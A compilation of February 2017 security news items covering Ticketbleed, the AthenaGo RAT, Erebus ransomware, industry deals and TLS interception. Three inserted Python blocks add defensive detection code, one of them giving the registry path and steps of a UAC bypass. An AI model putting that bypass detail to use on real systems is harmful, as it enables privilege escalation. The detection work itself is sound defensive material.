"Ticketbleed" Flaw Exposes F5 Appliances to Remote Attacks

9.2.2017 securityweek Attack
F5 Networks BIG-IP appliances are affected by a serious vulnerability that can be exploited by a remote attacker to extract memory. An Internet scan showed that hundreds of hosts had been exposed by the flaw.

The vulnerability, dubbed “Ticketbleed” and tracked as CVE-2016-9244, was discovered by Filippo Valsorda, cryptography engineer at CloudFlare, and other employees of the content delivery network (CDN). The expert identified the weakness while investigating a bug report from a CloudFlare customer, and notified F5 in late October.

According to F5, the vulnerability affects BIG-IP SSL virtual servers that have the non-default Session Tickets option enabled. The leaked memory can contain SSL session IDs and other potentially sensitive data.

As its name suggests, Ticketbleed is somewhat similar to the notorious OpenSSL vulnerability known as Heartbleed. However, unlike Heartbleed, Ticketbleed exposes 31 bytes of memory at a time instead of 64 kilobyte chunks – which means an attack requires more rounds – and it’s specific to F5 products.

The list of affected F5 BIG-IP products includes LTM, AAM, AFM, Analytics, APM, ASM, GTM, Link Controller, PEM and PSM. Updates that address the flaw have been released for most of these products. As a workaround, users can disable the Session Tickets option on the affected Client SSL profile from the Configuration utility's Local Traffic > Profiles > SSL > Client menu.

“The vulnerability lies in the implementation of Session Tickets, a resumption technique used to speed up repeated connections. When a client supplies a Session ID together with a Session Ticket, the server is supposed to echo back the Session ID to signal acceptance of the ticket. Session IDs can be anywhere between 1 and 31 bytes in length,” Valsorda explained.

“The F5 stack always echoes back 32 bytes of memory, even if the Session ID was shorter. An attacker providing a 1-byte Session ID would then receive 31 bytes of uninitialized memory,” the expert added.

Valsorda has made available a simple online tool that allows users to determine if their server is vulnerable to Ticketbleed attacks. Internet scans conducted by the researcher showed that 949 of the Alexa top one million websites were vulnerable, including 15 in the top 10,000 sites. Of the top one million hosts on Cisco’s Umbrella cloud security platform, over 1,600 were found to be affected.

Valsorda has provided detailed technical information on the vulnerability and made some recommendations for security vendors that might consider trying to detect potential Ticketbleed attacks.


Government Contractor Indicted Over Theft of Secret Documents

9.2.2017 securityweek BigBrothers
Harold Thomas Martin III, the former U.S. government contractor arrested last year for theft of classified material, was indicted on Wednesday by a federal grand jury.

Martin, age 52, of Glen Burnie, Maryland, had worked as a security contractor for several government agencies between 1993 and 2016 through at least seven private companies. Similar to the whistleblower Edward Snowden, he worked at the National Security Agency (NSA) while employed by intelligence contractor Booz Allen Hamilton.

According to authorities, Martin held Top Secret and Sensitive Compartmented Information (SCI) clearances, which provided him access to classified government computer systems, programs and information.

The indictment alleges that Martin stole vast amounts of classified material between 1996 and August 2016, when he was arrested. The files, including ones containing information that could cause serious damage to national security, were found in his home and car.

Investigators said the man had stolen 50 terabytes of files, including secret, top-secret and SCI documents related to the NSA, the Cyber Command (USCYBERCOM), the National Reconnaissance Office (NRO), and the Central Intelligence Agency (CIA).

“The indictment alleges that Martin knew that the stolen documents contained classified information that related to the national defense and that he was never authorized to retain these documents at his residence or in his vehicle,” said the Justice Department.

Martin has been indicted on 20 counts of willful retention of national defense information and he faces up to 10 years in prison for each count.

While the suspect’s attorneys have not commented recently, The Washington Post reported that they had previously claimed Martin took documents home in an effort to become better at his job and did not intend to provide any information to foreign governments.

At one point, some reports linked Martin to Shadow Brokers, the group that offered to sell exploits and tools allegedly stolen from the NSA-linked cyber espionage team known as the Equation Group.


AthenaGo RAT Uses Tor2Web for C&C Communication

9.2.2017 securityweek Virus
A newly observed Remote Access Trojan (RAT) targeting Windows systems is using Tor2Web proxies for communication with the command and control (C&C) server, Cisco Talos security researchers warn.

The RAT was written in Go, which is rather unusual for Windows malware, and its author refers to it as Athena, which led the researchers to call it AthenaGo. The Trojan, Cisco Talos threat researcher Edmund Brumaghin explains, relies on Tor2Web proxies for its communications and can download and run additional binaries on the infected system.

The malware is distributed via macro-enabled Word documents, an increasingly popular delivery method that was recently used to drop macOS malware as well. The malicious documents distributing AthenaGo appear to target Portuguese-speaking users, as the message that instructs potential victims to enable macros is written in Portuguese.

AthenaGo, one of the few Windows malware families to have been written in Go, comes with two hardcoded domains that it connects to post-infection. Both utilize Tor2Web, a project that allows access to resources on the Tor (The Onion Router) network even if the requesting client system isn’t part of the network.

“Tor2Web servers act as proxies and allow clients to access servers hosting content on Tor without requiring the installation of a local Tor client application. This approach has shown to be increasingly attractive to cybercriminals. The use of Tor2Web and Tor in general allows them to stay anonymous. It also makes it much more difficult to remove malicious content being hosted on servers within Tor, as it is difficult to identify where a Tor server is hosted physically,” the security researcher explains.

During the initial infection process, AthenaGo generates public and private RSA keys that are used to communicate with the C&C server, after which it makes two HTTP HEAD requests to the two hardcoded servers.

The malware supports several commands issued by the C&C server: ListDir (lists directories on the infected system), ListProcesses (lists running processes), KillProcess (runs the taskkill command against a target process), DownloadFile (downloads and saves a file), DLRUN (downloads a file to %TEMP% and executes it), and RunCMD (executes system commands on the infected system using Go's os/exec package).

“Malware authors will continue to evolve their attacks as they identify ways to effectively reduce their risk of being caught. This includes relying on C&C infrastructure hosted on Tor, making use of varying levels of encryption to protect the nature and content of network communications with their malware, and limiting their attacks to targeted attacks against specific targets or demographics. AthenaGo is an example of changes in the way malware is being written in an attempt to evade network defenses and successfully compromise target environments,” Cisco Talos’ researcher concludes.


Firms Increasingly Interested in Cyber Insurance: Study

9.2.2017 securityweek Cyber
Companies in the United States, the United Kingdom and Germany are increasingly interested in taking out cyber insurance, according to a new study commissioned by insurance provider Hiscox.

The cyber security readiness study, which involved 3,000 businesses from the three countries, shows that 30% of companies in Germany, 36% in the U.K. and 55% in the U.S. already have cyber insurance. Roughly 30% of the firms that don’t have insurance plan on getting insured in the next 12 months.

The top reasons for taking out cyber insurance are related to the cost of a potential breach and the need for peace of mind, data security concerns, the possibility of customer action, and new data regulations. In roughly one-quarter of cases, cyber insurance is a legal requirement.

Reasons for taking out cyber insurance

More than half of the respondents reported being hit by at least one cyberattack in the last 12 months and the cost of dealing with an incident has been significant. On average, companies in the United States with over 1,000 employees said the largest cyber incident had cost them more than $100,000.

In the case of small U.S. firms, with fewer than 100 employees, the average cost was roughly $35,000. Depending on their size, organizations in the U.K. reported spending between approximately $32,000 and $67,000, and organizations in Germany between $24,000 and $48,000.

The study shows that larger organizations are more likely to be interested in cyber insurance, and financial services is the most insurance-aware sector, with more than half of respondents already having cyber insurance.

Experts pointed out that Germany has been increasingly interested in cyber insurance since the attack on its parliament in 2015. Organizations in Europe are also looking for cyber insurance as a result of the EU’s new data protection regulations, which will take effect in 2018.

Of the companies that do not intend to get cyber insurance, many said the insurance policies are too complicated, they are not exactly sure what cyber insurance is, or they don’t trust the insurer to pay out in the event of an incident.

According to a report published by Allied Market Research (AMR) in December, the global cyber insurance market is expected to generate $14 billion by 2022, which represents a 28 percent increase from 2016.

In the meantime, some security companies have started providing alternatives to the traditional insurance services. San Francisco-based security consulting firm AsTech announced this week that it will be offering a $1 million warranty against breach-related costs if a customer is hacked as a result of a vulnerability that AsTech fails to discover. Endpoint security firm SentinelOne offered similar guarantees last year.


U.S. Queries PayPal in Money Laundering Probe

9.2.2017 securityweek IT
San Francisco - US authorities have demanded information from online payment service PayPal as part of a money laundering investigation, according to a regulatory filing available on Wednesday.

"We have received subpoenas from the US Department of Justice seeking the production of certain information related to our historical anti-money laundering program," Silicon Valley-based PayPal said in an annual report to the US Securities and Exchange Commission.

PayPal noted that it was cooperating with authorities and did not speculate on the outcome of the investigation. No further details were provided.

The news appeared to weigh slightly on PayPal shares, which were down more than 1.5 percent to $40.24 in after-market trades on the Nasdaq.


"Ticketbleed" Flaw Exposes F5 Appliances to Remote Attacks

9.2.2017 securityweek Attack
F5 Networks BIG-IP appliances are affected by a serious vulnerability that a remote attacker can exploit to extract memory. An Internet scan showed that hundreds of hosts are exposed to the flaw.

The vulnerability, dubbed “Ticketbleed” and tracked as CVE-2016-9244, was discovered by Filippo Valsorda, cryptography engineer at CloudFlare, and other employees of the content delivery network (CDN). The expert identified the weakness while investigating a bug report from a CloudFlare customer, and notified F5 in late October.

According to F5, the vulnerability affects BIG-IP SSL virtual servers that have the non-default Session Tickets option enabled. The leaked memory can contain SSL session IDs and other potentially sensitive data.

As its name suggests, Ticketbleed is somewhat similar to the notorious OpenSSL vulnerability known as Heartbleed. However, unlike Heartbleed, Ticketbleed exposes 31 bytes of memory at a time instead of 64 kilobyte chunks – which means an attack requires more rounds – and it’s specific to F5 products.

The list of affected F5 BIG-IP products includes LTM, AAM, AFM, Analytics, APM, ASM, GTM, Link Controller, PEM and PSM. Updates that address the flaw have been released for most of these products. As a workaround, users can disable the Session Tickets option on the affected Client SSL profile from the Configuration utility's Local Traffic > Profiles > SSL > Client menu.

“The vulnerability lies in the implementation of Session Tickets, a resumption technique used to speed up repeated connections. When a client supplies a Session ID together with a Session Ticket, the server is supposed to echo back the Session ID to signal acceptance of the ticket. Session IDs can be anywhere between 1 and 31 bytes in length,” Valsorda explained.

“The F5 stack always echoes back 32 bytes of memory, even if the Session ID was shorter. An attacker providing a 1-byte Session ID would then receive 31 bytes of uninitialized memory,” the expert added.

Valsorda has made available a simple online tool that allows users to determine if their server is vulnerable to Ticketbleed attacks. Internet scans conducted by the researcher showed that 949 of the Alexa top one million websites were vulnerable, including 15 in the top 10,000 sites. Of the top one million hosts on Cisco’s Umbrella cloud security platform, over 1,600 were found to be affected.

Valsorda has provided detailed technical information on the vulnerability and made some recommendations for security vendors that might consider trying to detect potential Ticketbleed attacks.
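The check a server operator or IDS vendor can derive from Valsorda's description above, written here as an added example (not Valsorda's online tool or F5's code): it parses a captured ClientHello/ServerHello pair and reports how many bytes the server echoed beyond the Session ID the client supplied. The record parser, the minimal hello builder and the sample bytes are constructed for this example.

```python
import struct

HANDSHAKE = 0x16                     # TLS record type for handshake messages
CLIENT_HELLO, SERVER_HELLO = 0x01, 0x02
EXT_SESSION_TICKET = 0x0023          # RFC 5077 SessionTicket extension type


def parse_hello(record: bytes) -> dict:
    """Parse one TLS record carrying a ClientHello or ServerHello.

    Returns the handshake type, the session_id bytes and whether a
    SessionTicket extension is present; raises ValueError on malformed input.
    """
    if len(record) < 5 or record[0] != HANDSHAKE:
        raise ValueError("not a TLS handshake record")
    rec_len = struct.unpack("!H", record[3:5])[0]
    body = record[5:5 + rec_len]
    if len(body) != rec_len or len(body) < 4:
        raise ValueError("truncated record")
    msg_type = body[0]
    msg_len = int.from_bytes(body[1:4], "big")
    msg = body[4:4 + msg_len]
    if len(msg) != msg_len or len(msg) < 35:
        raise ValueError("truncated handshake message")
    sid_len = msg[34]                # follows version(2) + random(32)
    if sid_len > 32:
        raise ValueError("session_id may be at most 32 bytes")
    pos = 35
    sid = msg[pos:pos + sid_len]
    pos += sid_len
    if msg_type == CLIENT_HELLO:
        cs_len = struct.unpack("!H", msg[pos:pos + 2])[0]
        pos += 2 + cs_len            # cipher_suites vector
        pos += 1 + msg[pos]          # compression_methods vector
    elif msg_type == SERVER_HELLO:
        pos += 2 + 1                 # chosen cipher_suite + compression_method
    else:
        raise ValueError("not a ClientHello or ServerHello")
    ticket_ext = False
    if pos + 2 <= len(msg):          # the extensions block is optional
        ext_len = struct.unpack("!H", msg[pos:pos + 2])[0]
        pos += 2
        end = min(pos + ext_len, len(msg))
        while pos + 4 <= end:
            etype, elen = struct.unpack("!HH", msg[pos:pos + 4])
            if etype == EXT_SESSION_TICKET:
                ticket_ext = True
            pos += 4 + elen
    return {"type": msg_type, "session_id": sid, "ticket_ext": ticket_ext}


def check_ticketbleed(client_hello: bytes, server_hello: bytes) -> dict:
    """Compare the Session ID the client offered with what the server echoed.

    A correct server echoes exactly the 1..31 byte Session ID to accept the
    ticket; the vulnerable F5 stack echoes 32 bytes, so any bytes beyond the
    client's own Session ID came from server memory.
    """
    c, s = parse_hello(client_hello), parse_hello(server_hello)
    if c["type"] != CLIENT_HELLO or s["type"] != SERVER_HELLO:
        raise ValueError("expected a ClientHello followed by a ServerHello")
    csid, ssid = c["session_id"], s["session_id"]
    # A fresh (non-resumed) session gets a new ID that does not start with the
    # client's; that is normal and is not flagged (a rare false positive is
    # possible when a random new ID happens to share the client's prefix).
    echoed = bool(csid) and ssid.startswith(csid)
    leaked = len(ssid) - len(csid) if echoed else 0
    return {
        "client_sent_ticket": c["ticket_ext"],
        "resumption_accepted": echoed,
        "leaked_bytes": leaked,
        "vulnerable": c["ticket_ext"] and leaked > 0,
    }


def build_hello(msg_type: int, session_id: bytes, with_ticket: bool) -> bytes:
    """Constructed minimal TLS 1.2 hello record used to exercise the checker."""
    msg = b"\x03\x03" + bytes(32)                      # version + zeroed random
    msg += bytes([len(session_id)]) + session_id
    if msg_type == CLIENT_HELLO:
        msg += b"\x00\x02\xc0\x2f" + b"\x01\x00"       # one suite, null compression
    else:
        msg += b"\xc0\x2f\x00"
    ext = b"\x00\x23\x00\x00" if with_ticket else b""  # empty SessionTicket ext
    msg += struct.pack("!H", len(ext)) + ext
    body = bytes([msg_type]) + len(msg).to_bytes(3, "big") + msg
    return bytes([HANDSHAKE, 0x03, 0x03]) + struct.pack("!H", len(body)) + body


def demo() -> dict:
    """Constructed exchange: the client resumes with a 1-byte Session ID."""
    client = build_hello(CLIENT_HELLO, b"\x01", with_ticket=True)
    # vulnerable behaviour: 32 bytes echoed, 31 of them stale server memory
    leaky = build_hello(SERVER_HELLO, b"\x01" + b"\xaa" * 31, with_ticket=True)
    # patched behaviour: exactly the supplied Session ID is echoed
    fixed = build_hello(SERVER_HELLO, b"\x01", with_ticket=True)
    return {"leaky": check_ticketbleed(client, leaky),
            "fixed": check_ticketbleed(client, fixed)}


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```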


HackerOne Penetrates VC Pockets for $40 Million

9.2.2017 securityweek Security
Bug bounty platform provider HackerOne announced on Wednesday that it has raised $40 million in a Series C financing round led by Dragoneer Investment Group.

The San Francisco-based startup offers a software-as-a-service platform that provides the technology and automation to help organizations run their own vulnerability management and bug bounty programs.

The company says the new funds will be used to invest in technology development, expand market reach, and strengthen its hacker community of more than 100,000 white hat hackers.


The company was co-founded by Alex Rice, the company’s CTO and the man behind Facebook’s bug bounty program, Merijn Terheggen, who serves as CEO, Jobert Abma (tech lead) and Michiel Prins (product lead). HackerOne gained publicity in November 2013 when it announced hosting the Internet Bug Bounty project funded by Microsoft and Facebook.

According to the security startup, more than 38,000 security vulnerabilities have been resolved across more than 700 HackerOne customers, with more than $14 million in bug bounties awarded to date, $7 million of which was awarded in 2016.

In 2016, the U.S. Department of Defense (DoD) selected HackerOne to run the U.S. federal government's first bug bounty challenge, Hack the Pentagon, which HackerOne says resolved more than 138 vulnerabilities discovered by 1,400 hackers.

In October 2016 the DoD announced that it awarded a combined $7 million to HackerOne and Synack for helping the organization’s components launch their own bug bounty initiatives. With $3 million awarded to HackerOne, the company will help the DoD run challenges similar to Hack the Pentagon, while Synack will provide assistance for a private program open only to highly vetted researchers, the DoD said, adding that the private program will focus on the Pentagon’s sensitive IT assets.

Other HackerOne customers include Airbnb, CloudFlare, General Motors, GitHub, New Relic, Nintendo, Qualcomm, Starbucks, Uber and Lufthansa.

“Our customers typically receive their first valid security vulnerability report the same day they challenge our diverse community of hackers to examine their code,” said Marten Mickos, CEO of HackerOne. “There’s no such thing as perfect software and bug bounty programs are the most efficient and cost-effective solution for finding security vulnerabilities in live software.”

NEA, Benchmark and Strategic Investors also participated in the Series C round.


Rockwell Automation Teams With Claroty on Industrial Network Security

9.2.2017 securityweek Security
Rockwell Automation announced this week that it is teaming up with industrial cybersecurity startup Claroty to combine their security products and services into future joint offerings.

Rockwell, an industrial automation giant with more than 22,000 employees, said that after a competitive review process it selected Claroty for its anomaly-detection software, purpose-built for industrial network security.

Armed with $32 million in funding raised through Series A and Series B rounds, Claroty exited stealth mode in September 2016 to announce a security platform designed to provide “extreme visibility” into Operational Technology (OT) environments and protect critical infrastructure from cyber threats.

Claroty has built a platform that provides broad support for control system manufacturers and employs “high-fidelity models and advanced algorithms” to monitor industrial control systems (ICS) communications and provide security and process integrity alerts. The platform can inspect a large number of industrial control protocols, both open and proprietary, from vendors including Siemens, Rockwell Automation/Allen Bradley, Yokogawa, Emerson, GE, Schneider Electric, Mitsubishi, Honeywell, ABB and more.

“More connected control systems combined with the potential for more attacks on those systems have made cybersecurity a top concern in the industrial world,” said Scott Lapcewich, vice president and general manager, Customer Support and Maintenance, Rockwell Automation. “Claroty’s deep-visibility software platform and expertise in industrial security made the company a natural fit for substantial collaboration as we grow our existing portfolio of security service and support offerings.”

“The Claroty platform can detect a bad actor’s activities at any stage, whether they’re trying to gain a foothold on a network, conduct reconnaissance or inflict damage,” said Amir Zilberstein, co-founder and CEO, Claroty. “It also can detect human errors and other process integrity issues, which are often more common than threats from bad-actors. For example, the software monitors for critical asset changes that, if done incorrectly, could result in unexpected downtime. The system also identifies network-configuration issues that could expose a system to outside threats.”


Erebus Ransomware Bypasses UAC for Privilege Elevation

9.2.2017 securityweek Virus
A newly observed ransomware variant is using a technique to bypass User Account Control (UAC) in order to elevate its privileges without displaying a UAC prompt, researchers have discovered.

Dubbed Erebus, the malware appears to be new, though it features the same name as a piece of ransomware that emerged in late September 2016. However, the different characteristics of the two malicious apps suggest that the newly discovered variant is either a completely different malware or a fully rewritten release, BleepingComputer’s Lawrence Abrams notes.

Details on Erebus’ distribution mechanism aren’t available at the moment. What is known, however, is that the malware leverages a UAC bypass technique that was detailed in August last year and which abuses Event Viewer to infect the compromised systems without alerting the user.

For that, the ransomware copies itself to a randomly named file in the same folder, after which it modifies the Windows registry to hijack the association for the .msc file extension and set it to launch the randomly named Erebus file instead.

Next, the ransomware executes eventvwr.exe (Event Viewer), which automatically opens the eventvwr.msc file, which in turn is meant to launch mmc.exe. Because the .msc extension is no longer associated with mmc.exe, however, the randomly named Erebus executable is launched instead. Moreover, because Event Viewer runs elevated, the executable inherits the same privileges, which allows it to bypass UAC.
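Detection logic for the chain just described, written here as an added example (not BleepingComputer's analysis or any Erebus code): it scans constructed Sysmon-style endpoint records for the two observable steps, a rewrite of the .msc open command away from mmc.exe and Event Viewer spawning a child other than mmc.exe, and escalates when both occur. The record field names, the sample file names and the registry path (taken from the public write-up of the technique, not from this page) are assumptions.

```python
import re

# Key the public Event Viewer bypass rewrites so that eventvwr.exe's .msc
# document launches an attacker binary instead of mmc.exe. The page only says
# "the association for the .msc file extension" is hijacked; this path is an
# assumption taken from the public write-up of the technique.
MSC_OPEN_COMMAND = re.compile(r"\\Classes\\mscfile\\shell\\open\\command$", re.IGNORECASE)
EVENTVWR, MMC = "eventvwr.exe", "mmc.exe"


def _basename(path: str) -> str:
    """Case-folded file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def flag_registry_event(ev: dict):
    """Alert when the .msc 'open' command is pointed at anything but mmc.exe."""
    if ev.get("type") != "registry_set":
        return None
    if not MSC_OPEN_COMMAND.search(ev.get("key", "")):
        return None
    if MMC in ev.get("value", "").lower():      # legitimate handler, e.g. mmc.exe "%1"
        return None
    return f"pid {ev['pid']} hijacked .msc association -> {ev['value']}"


def flag_process_event(ev: dict):
    """Alert when Event Viewer spawns anything but its normal mmc.exe child."""
    if ev.get("type") != "process_create":
        return None
    if _basename(ev.get("parent_image", "")) != EVENTVWR:
        return None
    if _basename(ev.get("image", "")) == MMC:
        return None
    return f"pid {ev['pid']}: eventvwr.exe launched {ev['image']} instead of mmc.exe"


def detect(events):
    """Run both rules over a record stream; escalate when the hijack is
    followed by an elevated non-mmc child, which is the complete bypass."""
    alerts, hijacked = [], False
    for ev in events:
        alert = flag_registry_event(ev)
        if alert:
            hijacked = True
            alerts.append(("medium", alert))
            continue
        alert = flag_process_event(ev)
        if alert:
            severity = "high" if hijacked and ev.get("integrity") == "High" else "medium"
            alerts.append((severity, alert))
    return alerts


SAMPLE_EVENTS = [  # constructed telemetry for this example, not a real capture
    {"type": "process_create", "pid": 4100, "image": r"C:\Users\u\Downloads\invoice.exe",
     "parent_image": r"C:\Windows\explorer.exe", "integrity": "Medium"},
    {"type": "registry_set", "pid": 4100,
     "key": r"HKU\S-1-5-21-1-2-3-1001\Software\Classes\mscfile\shell\open\command",
     "value": r"C:\Users\u\Downloads\kq2xz91f.exe"},
    {"type": "process_create", "pid": 4120, "image": r"C:\Windows\System32\eventvwr.exe",
     "parent_image": r"C:\Users\u\Downloads\invoice.exe", "integrity": "High"},
    {"type": "process_create", "pid": 4133, "image": r"C:\Users\u\Downloads\kq2xz91f.exe",
     "parent_image": r"C:\Windows\System32\eventvwr.exe", "integrity": "High"},
    # benign: an administrator opening Event Viewer the normal way
    {"type": "process_create", "pid": 5000, "image": r"C:\Windows\System32\mmc.exe",
     "parent_image": r"C:\Windows\System32\eventvwr.exe", "integrity": "High"},
]


if __name__ == "__main__":
    for severity, message in detect(SAMPLE_EVENTS):
        print(severity.upper(), message)
```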

When executed, the malware connects to two different domains to determine the victim’s IP address and the country that they are located in. Next, the malware downloads a TOR client and uses it to connect to its command and control (C&C) server.

The ransomware then proceeds to scan the victim's computer and search for certain file types to encrypt using AES encryption. At the moment, the malware targets around 60 file types, including images and documents. Erebus encrypts the file’s extension using ROT-23, the researcher says.

During encryption, the ransomware also clears the Windows Volume Shadow Copies, in an attempt to prevent users from restoring their files this way. As soon as the encryption process has been completed, the malware drops a ransom note on the Desktop under the name of README.HTML, and then displays it. Additionally, Erebus displays a message box on the desktop, alerting the victim that their files have been encrypted.

The ransom note contains the user’s unique ID, a list of encrypted files, and a button that takes the victim to the TOR payment site, where payment instructions are provided. The requested ransom is 0.085 Bitcoin, or around $90 at the moment, one of the lowest amounts demanded by any ransomware family.


Forcepoint Acquires Skyfence from Imperva

9.2.2017 securityweek Cyber
Forcepoint, the cybersecurity firm created from the $1.9 billion combination of Raytheon and Websense, today announced that it has agreed to acquire the Skyfence business from Imperva.

Skyfence is a player in the hot cloud access security broker (CASB) market, and provides visibility and control over cloud applications such as NetSuite, Office 365, Salesforce, Workday, Dropbox, G Suite and Box.

Skyfence was originally acquired by Imperva in February 2014.

The acquisition by Forcepoint, which is expected to be complete during the first quarter of 2017, will allow Forcepoint to integrate its web security and data loss prevention (DLP) technologies with Skyfence’s technology to provide customers increased visibility, control and security over cloud applications.

The integration also provides Forcepoint customers greater flexibility in deploying web security via on-premise, hybrid and cloud-based solutions, Forcepoint said.

CASBs, which provide security and visibility for companies moving to the cloud, have experienced rapid growth, with several players in the space being acquired by larger enterprise technology firms.

In June 2016, Cisco announced its intention to acquire CloudLock, a privately held CASB based in Waltham, Massachusetts, for $293 million in cash and assumed equity awards. In 2015, Microsoft bought Adallom and turned it into its Cloud App Security service, launched in April 2016. In 2014 Imperva bought Skyfence; in 2015, Palo Alto Networks bought CirroSecure; and in November 2015 Blue Coat (since acquired by Symantec) bought Elastica.

Forcepoint previously entered into a licensing arrangement with Skyfence in March 2015 that enabled Skyfence’s Cloud App Catalog to be integrated into Forcepoint’s web security gateway products.

Skyfence employees will join the Forcepoint team, with the core Skyfence team remaining based in Ramat Gan, Israel, the company said.


The First Czech High School Cyber Security Competition

9.2.2017 SecurityWorld IT
The first round of the Czech High School Cyber Security Competition, organized by the AFCEA Cyber Security Working Group together with a number of government, academic and professional organizations, has concluded successfully.

Nearly 1,100 people took part in the first round. 874 students from 162 secondary schools across the Czech Republic met all the competition criteria and were scored. 567 competitors from all regions of the Czech Republic advance to the second round. The South Moravian Region, Prague and the Vysočina Region will have the most representatives.

The first, "awareness" round of the competition showed that students have a good general knowledge of cyber security. Six students achieved the maximum score (40), and the average of 19.05 points across all scored students is a respectable result and certainly strong motivation for the next round.

Students from various types of schools took part, not only technical schools and gymnázia but also students from typically non-technical schools and fields of study, e.g. art and design secondary schools, nursing schools, hotel schools, etc. Some schools "sent" only individuals into the competition, others entire groups of several dozen participants. The school with the most students in the competition was the Střední škola informatiky, poštovnictví a finančnictví Brno.

It is difficult to rank the most successful schools, since there are many variables: the number of students entered together with their best, average and worst results, the number of students advancing, etc., and schools that entered fewer students are partly disadvantaged by them. Nevertheless, the Competition Committee carried out such a ranking, and the five most successful schools in the Czech Republic were:

Střední průmyslová škola elektrotechnická a Vyšší odborná škola, Pardubice;
Střední průmyslová škola na Proseku, Praha;
Církevní Gymnázium Německého Řádu, Olomouc;
Integrovaná střední škola technická a ekonomická, Sokolov;
SŠ AGC a.s., Teplice.

The evaluation of the first round also included individual visits to the schools, the personal presentation of diplomas and discussions with students on cyber security. Between 10 January and 3 February, members of the Competition Committee visited 31 schools, holding 29 discussions and lectures for more than 1,200 students and teachers.

The first round was scored by region and therefore had 14 groups of winners. The detailed results list is published on the competition website, www.kybersoutez.cz. Students advancing to the second round received, as part of their prizes and accompanying materials, access to a wide range of study materials on cyber security donated to the competition by a number of expert partners.

More thorough preparation will be needed for the second round, to be held in March of this year, as it will be more demanding, more technical and partly in English. Competitors will be vying for a place in the national final, which will be held with all finalists and their escorts in attendance on 1 June 2017 in Brno as part of the IDET 2017 international defence and security technology fair.


HTTPS Security Weakened by AV Products, Middleboxes: Study

8.2.2017 Securityweek Analysis
An increasing number of antiviruses and network appliances intercept TLS connections to gain visibility into encrypted traffic, but in many cases this weakens connection security and introduces vulnerabilities, according to a new study.

The study, focusing on the security impact of HTTPS interception, was carried out last summer by researchers at Mozilla, Google, CloudFlare, the University of Michigan, the University of Illinois Urbana-Champaign, the University of California Berkeley, and the International Computer Science Institute.

Experts have analyzed the TLS handshakes associated with web browsers, security products and malware, and created a set of heuristics designed to allow web servers to detect HTTPS interception and identify the product responsible.

Tests were conducted by deploying these heuristics on Mozilla’s Firefox update servers, the CloudFlare content distribution network (CDN), and some major e-commerce websites. The analysis showed that 4% of the Firefox connections, 6.2% of the e-commerce connections, and nearly 11% of US-based CloudFlare connections were intercepted.

Worryingly, 97% of the Firefox, 54% of the CloudFlare and 32% of the e-commerce connections that were intercepted became less secure. More than 62% of the middlebox connections were weakened and over 58% had severe vulnerabilities.

“Alarmingly, not only did intercepted connections use weaker cryptographic algorithms, but 10–40% advertised support for known-broken ciphers that would allow an active man-in-the-middle attacker to later intercept, downgrade, and decrypt the connection,” researchers said in their report.

The list of middlebox vendors whose products were tested includes A10 Networks, Blue Coat, Barracuda, Check Point, Cisco, Forcepoint, Fortinet, Juniper Networks, Microsoft, Sophos, Untangle and WebTitan. Only the Blue Coat product received an A grade (optimal TLS connection equivalent to modern browsers), while the others received a C (contains known vulnerability) or F (severely broken connection vulnerable to MitM attacks).
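The detection heuristic and the A/C/F grading described above, in simplified form. This is an added example, not the study's code; the Firefox fingerprint and the split into "broken" and "weak" cipher sets are constructed assumptions, while the cipher-suite and extension numbers are real IANA values.

```python
"""Simplified server-side HTTPS-interception heuristic with A/C/F grading.

Added example, not code from the study. A TLS-terminating server sees both the
HTTP User-Agent and the ClientHello of each connection. Real browsers send a
stable, well-known ClientHello, so a User-Agent claiming to be Firefox paired
with a ClientHello that does not match Firefox's indicates that an antivirus
or middlebox terminated TLS and re-originated the connection. The browser
fingerprint below is an illustrative constant, not the study's exact list.
"""
import re
from dataclasses import dataclass

# Real IANA cipher-suite code points. Which ones count as "broken" or "weak"
# is our simplification of the study's grading, not its published rules.
KNOWN_BROKEN = {0x0003, 0x0004, 0x0005, 0x0006}   # export-grade and RC4 suites
WEAK = {0x000A}                                    # 3DES
FORWARD_SECRET = {0xC02B, 0xC02C, 0xC02F, 0xC030, 0xCCA8, 0xCCA9}  # ECDHE


@dataclass(frozen=True)
class ClientHello:
    cipher_suites: tuple   # IANA code points, in the order advertised
    extensions: tuple      # IANA extension types, in the order advertised


# Constructed fingerprint for Firefox 5x (not the study's). Extension numbers
# are real IANA values: 0 SNI, 23 extended_master_secret, 65281
# renegotiation_info, 10 supported_groups, 11 ec_point_formats,
# 35 session_ticket, 16 ALPN, 13 signature_algorithms.
FIREFOX_HELLO = ClientHello(
    (0xC02B, 0xC02F, 0xC02C, 0xC030, 0xCCA9, 0xCCA8, 0x002F, 0x0035),
    (0, 23, 65281, 10, 11, 35, 16, 13),
)
BROWSER_FINGERPRINTS = {re.compile(r"Firefox/5\d\."): FIREFOX_HELLO}


def grade(hello):
    """Grade a handshake on its own merits: F severely broken, C known
    weakness, A comparable to a modern browser."""
    suites = set(hello.cipher_suites)
    if suites & KNOWN_BROKEN:
        return "F"
    if (suites & WEAK) or not (suites & FORWARD_SECRET):
        return "C"
    return "A"


def classify(user_agent, hello):
    """Decide whether the connection was intercepted (ClientHello does not
    match the browser named in User-Agent) and how secure it is."""
    for pattern, expected in BROWSER_FINGERPRINTS.items():
        if pattern.search(user_agent):
            intercepted = hello != expected
            return {
                "browser_known": True,
                "intercepted": intercepted,
                "grade": grade(hello),
                "reason": ("ClientHello differs from the browser's fingerprint"
                           if intercepted else None),
            }
    # Unknown client: we can still grade it, but cannot claim interception.
    return {"browser_known": False, "intercepted": None,
            "grade": grade(hello), "reason": "no fingerprint for this User-Agent"}


# Constructed samples.
FIREFOX_UA = "Mozilla/5.0 (Windows NT 10.0; rv:51.0) Gecko/20100101 Firefox/51.0"
# A middlebox re-originating the connection with its own older TLS stack that
# drops most forward-secret suites and still offers RC4 (grade F).
MIDDLEBOX_HELLO = ClientHello(
    (0xC02F, 0x002F, 0x0035, 0x000A, 0x0005, 0x0004),
    (0, 10, 11, 35),
)

if __name__ == "__main__":
    print("direct:      ", classify(FIREFOX_UA, FIREFOX_HELLO))
    print("intercepted: ", classify(FIREFOX_UA, MIDDLEBOX_HELLO))
```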

Security of TLS Interception Middleboxes

The antiviruses analyzed in the study include Windows and Mac products from Avast, AVG, Bitdefender, Bullguard, CYBERsitter, Dr. Web, ESET, G DATA, Kaspersky, KinderGate, Net Nanny, PC Pandora and Qustodio. Only two of the tested Avast products received an A grade.

The researchers said they reported their findings to the affected vendors. While some have addressed the issues or plan to do so, others ignored the reports or refused to update their products and shifted responsibility to customers.

